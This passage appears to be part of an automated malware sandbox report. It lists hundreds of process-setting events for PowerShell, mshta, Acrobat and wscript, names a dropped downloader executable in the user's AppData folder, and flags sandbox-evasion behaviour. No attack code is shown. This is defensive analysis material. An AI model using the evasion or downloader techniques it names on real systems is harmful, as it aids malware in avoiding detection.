        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
